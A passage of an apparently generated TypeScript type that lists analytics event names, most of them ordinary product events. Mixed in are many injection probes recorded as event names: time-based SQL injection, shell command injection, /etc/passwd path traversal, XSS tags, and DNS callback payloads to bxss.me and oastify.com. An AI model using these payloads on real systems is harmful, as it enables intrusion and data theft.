    '&echo xorowk$()\\ slyoyu\\nz^xyu||a #\' &echo xorowk$()\\ slyoyu\\nz^xyu||a #|" &echo xorowk$()\\ slyoyu\\nz^xyu||a #': Record<
        string,
        any
    >
    'echo xtsxzz$()\\ lossos\\nz^xyu||a #\' &echo xtsxzz$()\\ lossos\\nz^xyu||a #|" &echo xtsxzz$()\\ lossos\\nz^xyu||a #': Record<
        string,
        any
    >
    '&echo ycyuvr$()\\ ydinxq\\nz^xyu||a #\' &echo ycyuvr$()\\ ydinxq\\nz^xyu||a #|" &echo ycyuvr$()\\ ydinxq\\nz^xyu||a #': Record<
        string,
        any
    >
    '|echo yffoxd$()\\ sahjey\\nz^xyu||a #\' |echo yffoxd$()\\ sahjey\\nz^xyu||a #|" |echo yffoxd$()\\ sahjey\\nz^xyu||a #': Record<
        string,
        any
    >
    '&echo ygqiti$()\\ yfdbso\\nz^xyu||a #\' &echo ygqiti$()\\ yfdbso\\nz^xyu||a #|" &echo ygqiti$()\\ yfdbso\\nz^xyu||a #': Record<
        string,
        any
    >
    '&echo zdfpjh$()\\ yacoxc\\nz^xyu||a #\' &echo zdfpjh$()\\ yacoxc\\nz^xyu||a #|" &echo zdfpjh$()\\ yacoxc\\nz^xyu||a #': Record<
        string,
        any
    >
    '|echo zeyabx$()\\ lqueyp\\nz^xyu||a #\' |echo zeyabx$()\\ lqueyp\\nz^xyu||a #|" |echo zeyabx$()\\ lqueyp\\nz^xyu||a #': Record<
        string,
        any
    >
    '|echo zfeckv$()\\ uyjnfb\\nz^xyu||a #\' |echo zfeckv$()\\ uyjnfb\\nz^xyu||a #|" |echo zfeckv$()\\ uyjnfb\\nz^xyu||a #': Record<
        string,
        any
    >
    '|echo zfhqmt$()\\ lregci\\nz^xyu||a #\' |echo zfhqmt$()\\ lregci\\nz^xyu||a #|" |echo zfhqmt$()\\ lregci\\nz^xyu||a #': Record<
        string,
        any
    >
    '&echo zfqucl$()\\ hmafyy\\nz^xyu||a #\' &echo zfqucl$()\\ hmafyy\\nz^xyu||a #|" &echo zfqucl$()\\ hmafyy\\nz^xyu||a #': Record<
        string,
        any
    >
    'Edmond Carter': Record<string, any>
    "EDohuX5P')) OR 170=(SELECT 170 FROM PG_SLEEP(15))--": Record<string, any>
    'Edwina Swift': Record<string, any>
    "EIbd9Q1q' OR 83=(SELECT 83 FROM PG_SLEEP(15))--": Record<string, any>
    "eKgjrCcd') OR 67=(SELECT 67 FROM PG_SLEEP(15))--": Record<string, any>
    'element resized': Record<string, any>
    'Elian Cummerata': Record<string, any>
    'email mfa link sent': Record<string, any>
    'Email Received': Record<string, any>
    'Emelie Turner': Record<string, any>
    ENBOCZap: Record<string, any>
    'entered into weekly digest email flow': Record<string, any>
    'entered product analytics ingestion activation email campaign': Record<string, any>
    'entered product analytics insights activation email campaign': Record<string, any>
    'entered replay activation email campaign': Record<string, any>
    'entity filter visbility set': Record<string, any>
    '{"$eq":"$opt_in"}': Record<string, any>
    '{"$eq":"$pageview"}': Record<string, any>
    '{"$eq":"uldrnq"}': Record<string, any>
    'error toast help requested': Record<string, any>
    error_tracking_assignment_rule_created: Record<string, any>
    error_tracking_external_issue_clicked: Record<string, any>
    error_tracking_external_issue_created: Record<string, any>
    error_tracking_frame_context_loaded: Record<string, any>
    error_tracking_grouping_rule_created: Record<string, any>
    error_tracking_impact_event_selected: Record<string, any>
    error_tracking_issue_assign: Record<string, any>
    error_tracking_issue_assigned: Record<string, any>
    error_tracking_issue_bulk_activate: Record<string, any>
    error_tracking_issue_bulk_assign: Record<string, any>
    error_tracking_issue_bulk_resolve: Record<string, any>
    error_tracking_issue_bulk_suppress: Record<string, any>
    error_tracking_issue_created: Record<string, any>
    error_tracking_issue_merged: Record<string, any>
    error_tracking_issue_name_updated: Record<string, any>
    error_tracking_issue_reopened: Record<string, any>
    error_tracking_issue_split: Record<string, any>
    error_tracking_issue_status_updated: Record<string, any>
    error_tracking_issue_update_assignee: Record<string, any>
    error_tracking_issue_update_description: Record<string, any>
    error_tracking_issue_update_name: Record<string, any>
    error_tracking_issue_update_status: Record<string, any>
    error_tracking_issue_viewed: Record<string, any>
    error_tracking_prompt_copied: Record<string, any>
    error_tracking_sort_by_revenue_clicked: Record<string, any>
    error_tracking_stacktrace_explored: Record<string, any>
    error_tracking_suppression_rule_created: Record<string, any>
    error_tracking_symbol_set_deleted: Record<string, any>
    error_tracking_symbol_set_deprecated_endpoint: Record<string, any>
    error_tracking_symbol_set_saved: Record<string, any>
    error_tracking_symbol_set_uploaded: Record<string, any>
    error_tracking_symbol_set_upload_started: Record<string, any>
    esNscmrW: Record<string, any>
    '@@eSuUX': Record<string, any>
    '../../../../../../../../../../../../../../etc/passwd': Record<string, any>
    '/etc/shells': Record<string, any>
    eTMQk6Op: Record<string, any>
    "eval(compile('for x in range(1):\\n import time\\n time.sleep(20)','a','single'))": Record<string, any>
    event: Record<string, any>
    event1: Record<string, any>
    event2: Record<string, any>
    event3: Record<string, any>
    event_count_impact_test: Record<string, any>
    'event definition deleted': Record<string, any>
    'event definitions page event nested properties load failed': Record<string, any>
    'event definitions page event nested properties load succeeded': Record<string, any>
    'event definitions page event nested property show detail clicked': Record<string, any>
    'event definitions page load failed': Record<string, any>
    'event definitions page load succeeded': Record<string, any>
    'Event from 003_solver<img src=x onerror="console.log(666)">': Record<string, any>
    '[event-name]': Record<string, any>
    'event name': Record<string, any>
    event_name: Record<string, any>
    'event property definitions page load failed': Record<string, any>
    'event property definitions page load succeeded': Record<string, any>
    'event searched': Record<string, any>
    'events table polling paused': Record<string, any>
    'events table polling resumed': Record<string, any>
    'event verification toggled': Record<string, any>
    'event-with-groups': Record<string, any>
    "EWjjW6Pc')) OR 407=(SELECT 407 FROM PG_SLEEP(15))--": Record<string, any>
    'exceeded max page limit loading toolbar element stats pages': Record<string, any>
    EXLwcYuf: Record<string, any>
    'experimentation call prompt action': Record<string, any>
    'experiment completed': Record<string, any>
    'experiment created': Record<string, any>
    'experiment dashboard created': Record<string, any>
    'experiment end date changed': Record<string, any>
    'experiment exposure cohort created': Record<string, any>
    'experiment exposure cohort edited': Record<string, any>
    'experiment feature flag modal opened': Record<string, any>
    'experiment feature flag selected': Record<string, any>
    'experiment holdout assigned': Record<string, any>
    'experiment holdout created': Record<string, any>
    'experiment load insight failed': Record<string, any>
    'experiment metric timeout': Record<string, any>
    'experiment_recalculation_time team setting updated': Record<string, any>
    'experiment release conditions updated': Record<string, any>
    'experiment release conditions viewed': Record<string, any>
    'experiment reset': Record<string, any>
    'experiment result calculated': Record<string, any>
    'experiment results loading timeout': Record<string, any>
    'experiment shared metric assigned': Record<string, any>
    'experiment shared metric created': Record<string, any>
    'experiment start date changed': Record<string, any>
    'experiment timeseries recalculated': Record<string, any>
    'experiment timeseries viewed': Record<string, any>
    'experiment updated': Record<string, any>
    'experiment variant screenshot uploaded': Record<string, any>
    'experiment variant shipped': Record<string, any>
    'experiment viewed': Record<string, any>
    'export created': Record<string, any>
    'export failed': Record<string, any>
    'export queued': Record<string, any>
    'export requested': Record<string, any>
    'export started': Record<string, any>
    'export succeeded': Record<string, any>
    'export timeout error returned': Record<string, any>
    expression_injection: Record<string, any>
    'external data sync job': Record<string, any>
    'extra_settings team setting updated': Record<string, any>
    '@@ey242': Record<string, any>
    "eyDu89Dw' OR 15=(SELECT 15 FROM PG_SLEEP(15))--": Record<string, any>
    'failed to create feature flag with cohort': Record<string, any>
    'fake event': Record<string, any>
    'Fatima Erdman': Record<string, any>
    'Fatima Witting': Record<string, any>
    "fCtNfwWD' OR 206=(SELECT 206 FROM PG_SLEEP(15))--": Record<string, any>
    "FDzmIWpd')) OR 759=(SELECT 759 FROM PG_SLEEP(15))--": Record<string, any>
    'feature_flag_confirmation_enabled team setting updated': Record<string, any>
    'feature_flag_confirmation_message team setting updated': Record<string, any>
    'feature flag copied': Record<string, any>
    'feature flag copy failure': Record<string, any>
    'feature flag created': Record<string, any>
    'feature flag deleted': Record<string, any>
    'feature flag override created': Record<string, any>
    'feature flag override deleted': Record<string, any>
    'feature flag override updated': Record<string, any>
    'feature flag scheduled': Record<string, any>
    'feature flag schedule failure': Record<string, any>
    'feature flag updated': Record<string, any>
    feature_used: Record<string, any>
    'Feedback Sent': Record<string, any>
    'Feedbac Sent': Record<string, any>
    fetch_completed: Record<string, any>
    'file:///etc/passwd': Record<string, any>
    'filter added': Record<string, any>
    'filters set': Record<string, any>
    'filter updated': Record<string, any>
    'first bill upcoming email': Record<string, any>
    'first ingestion reminder email sent': Record<string, any>
    'first team event ingested': Record<string, any>
    'flags code example language selected': Record<string, any>
    'flags code example option selected': Record<string, any>
    'flags_persistence_default team setting updated': Record<string, any>
    fNVAdlYv: Record<string, any>
    foo: Record<string, any>
    'foo � bar': Record<string, any>
    'form submission': Record<string, any>
    "fP83j4uI' OR 65=(SELECT 65 FROM PG_SLEEP(15))--": Record<string, any>
    '@@Fqzor': Record<string, any>
    'Friedrich Reynolds': Record<string, any>
    fT3nDJOP: Record<string, any>
    '@@ftw44': Record<string, any>
    'funnel cue 7301 - shown': Record<string, any>
    'funnel cue 7301 - terminated': Record<string, any>
    'funnel result calculated': Record<string, any>
    'funnel step reordered': Record<string, any>
    'funny event': Record<string, any>
    "FzcmccGj') OR 635=(SELECT 635 FROM PG_SLEEP(15))--": Record<string, any>
    "g0FiBpkE' OR 446=(SELECT 446 FROM PG_SLEEP(15))--": Record<string, any>
    'Gabrielle McKenzie': Record<string, any>
    'Garry Konopelski': Record<string, any>
    'generated HogQL with AI': Record<string, any>
    'Geovanny Borer': Record<string, any>
    'Germaine Abbott': Record<string, any>
    '#{"".getClass().forName("java.net.URL").getConstructors()[2].newInstance("http://vvukg0qpaqnzaglcw9171iv3puvmjha544s2kpac10q.oastify.com.").hashCode()}': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitay'.'awdalhmtae45c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(73).chr(121).chr(85).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitaz"."cohdqzof217d5.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(80).chr(121).chr(70)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitbh'.'emufjkzs312a0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(83).chr(122).chr(83).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitbj"."bpgpkyti5d682.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(76).chr(105).chr(81)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitbs"."oygzotqx2d25e.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(83).chr(105).chr(90)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitca"."jwkxbvir7d45d.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(87).chr(101).chr(88)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitcn"."ojvqlcvr25687.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(65).chr(97).chr(75)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitcu'.'ofpvvrzma292b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(67).chr(114).chr(82).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitdb'.'qjqgqecfea586.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(87).chr(101).chr(85).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitdc"."zvxlqwnq68d00.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(83).chr(106).chr(69)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitdg"."pwyvwikx0ae4b.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(74).chr(99).chr(83)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitdt"."qozzxsbobf7ef.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(69).chr(118).chr(86)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitek"."elehasww9b06c.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(90).chr(109).chr(66)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitfd'.'ruoanqnlae214.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(66).chr(102).chr(69).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitfx"."ctixhaej3fae9.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(71).chr(99).chr(79)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitfy'.'zxamhpfo77898.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(77).chr(113).chr(66).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitge'.'rmgtlkxi2b243.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(76).chr(100).chr(89).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitgj"."bezkrhgrccbbb.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(82).chr(99).chr(87)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitgx'.'yspyaujp5707c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(79).chr(110).chr(68).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitha'.'gvphbykhd718f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(76).chr(97).chr(87).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hithc"."fqqtoolz09430.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(89).chr(102).chr(88)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hithy'.'tqsfohnvd2c5f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(87).chr(113).chr(72).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitii"."nbryfqze4f395.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(79).chr(106).chr(90)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitij'.'kpnkuubs0d9c7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(119).chr(75).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitil'.'phaotvmwaf442.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(74).chr(120).chr(89).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitin"."hkdpdxhod3440.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(78).chr(103).chr(89)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitiy"."tyblehrl69fe8.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(84).chr(103).chr(65)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitje"."devjvomf0924c.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(74).chr(107).chr(80)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitji'.'cmmenrxj4d00a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(66).chr(97).chr(66).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitmq'.'pefkcimt8633f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(74).chr(115).chr(76).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitms"."xamhcrne98163.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(78).chr(109).chr(66)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitnv'.'zluuzywd8aa72.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(74).chr(114).chr(86).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitoc'.'govjcpvu417f9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(88).chr(121).chr(82).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitom'.'eyvkstyg14552.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(89).chr(121).chr(72).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hiton"."douxhziz3eca0.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(85).chr(109).chr(88)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitoo'.'vwgjxzpwb20a2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(87).chr(109).chr(86).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitot"."symrgvag05d33.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(89).chr(118).chr(75)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitox"."ttavdrha2d721.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(79).chr(113).chr(89)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitpc"."ahnunkfc477ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(66).chr(99).chr(85)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitpe"."ljhjtafzd1875.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(69).chr(110).chr(77)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitpy'.'fmxchbap09d61.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(80).chr(102).chr(72).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitqi'.'evtyjklrcd809.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(65).chr(118).chr(67).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitqj"."gefrrvap3be1b.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(65).chr(121).chr(72)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitql"."pnkgaexmb0b10.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(84).chr(110).chr(87)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitqp'.'bzbmqxvp7d2a4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(69).chr(101).chr(74).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitrd'.'kpmwpcija81ed.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(73).chr(98).chr(66).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitrh"."ehsvixiq2f6fd.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(77).chr(103).chr(78)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitrj'.'wcldwkgr774d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(69).chr(114).chr(71).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitru'.'evhkyajtb1c61.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(84).chr(120).chr(76).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitru"."ztrtunxh756f7.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(90).chr(105).chr(87)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitrv"."rjdrngbrc5221.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(71).chr(110).chr(74)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hittf"."xylenbeaa369f.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(72).chr(112).chr(73)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitth'.'aukpvvxf88af9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(78).chr(108).chr(87).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hittu'.'yuiunwth7c333.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(66).chr(104).chr(79).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitua'.'cstcrrvb788cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(73).chr(119).chr(90).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitup'.'bhnfwgmx41a50.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(84).chr(118).chr(79).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitux"."patnzelf365f7.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(87).chr(115).chr(68)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitva'.'jnbkxfan91762.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(77).chr(117).chr(67).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitvg"."czaqmjlre51f2.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(67).chr(107).chr(88)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitvh'.'uhdjemwja2c16.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(87).chr(102).chr(68).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitwb'.'xpwsrgnh9d1f6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(78).chr(112).chr(77).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitwf"."eldxcigc0d4a9.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(80).chr(102).chr(72)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitwm'.'tfrvpmncd53a7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(69).chr(122).chr(69).'": Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitxc'.'niheycqwf4057.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(80).chr(108).chr(84).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitxe"."hmswzbhq61235.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(74).chr(98).chr(79)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hitxy"."etknxhrp82d29.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(77).chr(115).chr(90)."': Record<
        string,
        any
    >
    '".gethostbyname(lc("hityh"."xakdenqi72842.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(76).chr(115).chr(67)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hityk'.'mqwzgjhg0a577.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(87).chr(105).chr(90).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hityp"."jyymiqwp19515.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(88).chr(110).chr(83)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hityr'.'xkuhobdn45462.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(87).chr(115).chr(75).'": Record<
        string,
        any
    >
    '".gethostbyname(lc("hitzj"."joeeaxst912c2.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(76).chr(97).chr(90)."': Record<
        string,
        any
    >
    "'.gethostbyname(lc('hitzw'.'ziyuuczj2c1b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(83).chr(97).chr(65).'": Record<
        string,
        any
    >
    'get org usage report failure': Record<string, any>
    'get started: clicked Continue': Record<string, any>
    'gh-actions-test-emitting-from-actions': Record<string, any>
    "ghDMq9gr'; waitfor delay '0:0:15' -- ": Record<string, any>
    gh_star: Record<string, any>
    'github action job': Record<string, any>
    'github action step': Record<string, any>
    'github metrics': Record<string, any>
    github_star: Record<string, any>
    'Github Star': Record<string, any>
    'github workflow completed': Record<string, any>
    'give back friday - Learn more': Record<string, any>
    'give back friday - Star our repo on GitHub': Record<string, any>
    "Gqqg5LPN' OR 147=(SELECT 147 FROM PG_SLEEP(15))--": Record<string, any>
    'Graciela Yost': Record<string, any>
    'Griffin Leannon': Record<string, any>
    'group property added': Record<string, any>
    'group property removed': Record<string, any>
    'group property updated': Record<string, any>
    grouptest: Record<string, any>
    'group type detail dashboard created': Record<string, any>
    'group type ingested': Record<string, any>
    'group view saved': Record<string, any>
    'Gudrun Deckow': Record<string, any>
    "GUnPi20e') OR 210=(SELECT 210 FROM PG_SLEEP(15))--": Record<string, any>
    gW2n4RVL: Record<string, any>
    "gyom3lQa' OR 739=(SELECT 739 FROM PG_SLEEP(15))--": Record<string, any>
    "H37mUHSx')) OR 460=(SELECT 460 FROM PG_SLEEP(15))--": Record<string, any>
    h9rwcfm9bm6mx42suvgojcdp3g99x8l0dobgy6lx9m: Record<string, any>
    hacker: Record<string, any>
    'Hadley Klein': Record<string, any>
    "HaISg6U5'; waitfor delay '0:0:15' -- ": Record<string, any>
    'Hank Daugherty': Record<string, any>
    'has_completed_onboarding_for team setting updated': Record<string, any>
    hay_sizin_kuracagainiz_evente_ya: Record<string, any>
    'header is here': Record<string, any>
    heartbeat: Record<string, any>
    heartbeat_api: Record<string, any>
    heartbeat_buffer: Record<string, any>
    'heatmaps_opt_in team setting updated': Record<string, any>
    'heatmaps toggled': Record<string, any>
    'hedgehog mode disabled': Record<string, any>
    'hedgehog mode enabled': Record<string, any>
    'Hei simen': Record<string, any>
    hello: Record<string, any>
    'Hello!': Record<string, any>
    hello_event: Record<string, any>
    'hello-I-look-for-a-job': Record<string, any>
    'hello there': Record<string, any>
    'hello, world': Record<string, any>
    helm_install: Record<string, any>
    'help button used': Record<string, any>
    'help button viewed': Record<string, any>
    "heOxVyDw')) OR 909=(SELECT 909 FROM PG_SLEEP(15))--": Record<string, any>
    hey: Record<string, any>
    "hhNzQKUz' OR 611=(SELECT 611 FROM PG_SLEEP(15))--": Record<string, any>
    hi: Record<string, any>
    'high icp customer onboarding': Record<string, any>
    'hi there': Record<string, any>
    'hJ@#$#####$#': Record<string, any>
    "HnBReouZ') OR 325=(SELECT 325 FROM PG_SLEEP(15))--": Record<string, any>
    hog_flow_activated: Record<string, any>
    hog_flow_created: Record<string, any>
    hog_flow_started: Record<string, any>
    'hog function created from plugin config api': Record<string, any>
    'hog function saved': Record<string, any>
    hog_function_state_change: Record<string, any>
    'hog function state changed': Record<string, any>
    hogql_compare: Record<string, any>
    "hOnSbBQb')) OR 874=(SELECT 874 FROM PG_SLEEP(15))--": Record<string, any>
    'hotkey navigation': Record<string, any>
    "HpdZv5G9') OR 792=(SELECT 792 FROM PG_SLEEP(15))--": Record<string, any>
    '@@HrpRU': Record<string, any>
    "hSIRS29J') OR 635=(SELECT 635 FROM PG_SLEEP(15))--": Record<string, any>
    'Http://bxss.me/t/fit.txt': Record<string, any>
    'http://bxss.me/t/fit.txt%3F.jpg': Record<string, any>
    'HttP://bxss.me/t/xss.html?%00': Record<string, any>
    'Http://cgw11hb6v78gvx6thqmomzgkabg34yvmoocm49uwlka.oastify.com?$pageview': Record<string, any>
    'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg': Record<string, any>
    'http://rhc6kpujjwew5ea225oyrmlzbqhj5it8h69tzgq4f.oastify.com?$pageview': Record<string, any>
    'http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg': Record<string, any>
    'https://uvtjgzqoapnyaflbw8161hv2ptvljga41szkma91xq.oastify.com?$pageview': Record<string, any>
    'http://w63lr11qlry0lhwd7ac8cj640v6nuil6bu9mwcj37s.oastify.com?$pageview': Record<string, any>
    'hubspot contact sync all contacts completed': Record<string, any>
    'hubspot contact sync batch completed': Record<string, any>
    'hubspot daily sync completed': Record<string, any>
    'hubspot daily sync started': Record<string, any>
    'hubspot score sync started': Record<string, any>
    'hubspot score updated': Record<string, any>
    'human_friendly_comparison_periods team setting updated': Record<string, any>
    "hvbjNsj0' OR 278=(SELECT 278 FROM PG_SLEEP(15))--": Record<string, any>
    "HvCic4rQ'; waitfor delay '0:0:15' -- ": Record<string, any>
    hydC58SL: Record<string, any>
    "I0IZsPlH' OR 893=(SELECT 893 FROM PG_SLEEP(15))--": Record<string, any>
    i4iflutD: Record<string, any>
    'Ian Labadie': Record<string, any>
    "Ic2T4Du8' OR 631=(SELECT 631 FROM PG_SLEEP(15))--": Record<string, any>
    'Identified Stripe Customer': Record<string, any>
    IEbY9zmr: Record<string, any>
    'if(now()=sysdate(),sleep(15),0)': Record<string, any>
    'if-you-are-a-lovely-dev-click-on-this-event': Record<string, any>
    "ILNhhOtg')) OR 818=(SELECT 818 FROM PG_SLEEP(15))--": Record<string, any>
    "<img src=x onerror=alert('XSS')>": Record<string, any>
    "<img src=x onerror=console.log('XSS')>": Record<string, any>
    "imsacyEv')) OR 161=(SELECT 161 FROM PG_SLEEP(15))--": Record<string, any>
    'in-app heatmap failed': Record<string, any>
    'in-app heatmap frame loaded': Record<string, any>
    'in-app heatmap iframe loaded': Record<string, any>
    'in-app heatmap loaded': Record<string, any>
    'in-app iFrame banner set': Record<string, any>
    'inbound hands-on pipeline closed admin': Record<string, any>
    'inbound hands-on pipeline closed lost': Record<string, any>
    'inbound hands-on pipeline closed won': Record<string, any>
    'inbound hands-on pipeline commercial and legal review': Record<string, any>
    'inbound hands-on pipeline demo completed': Record<string, any>
    'inbound hands-on pipeline inbound lead': Record<string, any>
    'inbound hands-on pipeline meeting booked': Record<string, any>
    'inbound hands-on pipeline product evaluation started': Record<string, any>
    'inbound self-serve pipeline demo completed': Record<string, any>
    'inbound self-serve pipeline first invoice paid': Record<string, any>
    'inbound self-serve pipeline inbound lead': Record<string, any>
    'incident declared': Record<string, any>
    'ingestion autocapture exceptions toggled': Record<string, any>
    'ingestion autocapture toggled': Record<string, any>
    'ingestion billing cancelled': Record<string, any>
    'ingestion bookmarklet panel hidden': Record<string, any>
    'ingestion bookmarklet panel shown': Record<string, any>
    'ingestion continue without adding billing details': Record<string, any>
    'ingestion continue without verifying': Record<string, any>
    'ingestion help clicked': Record<string, any>
    'ingestion landing seen': Record<string, any>
    'ingestion recordings turned off': Record<string, any>
    'ingestion select framework type': Record<string, any>
    'ingestion select platform type': Record<string, any>
    'ingestion sidebar button clicked': Record<string, any>
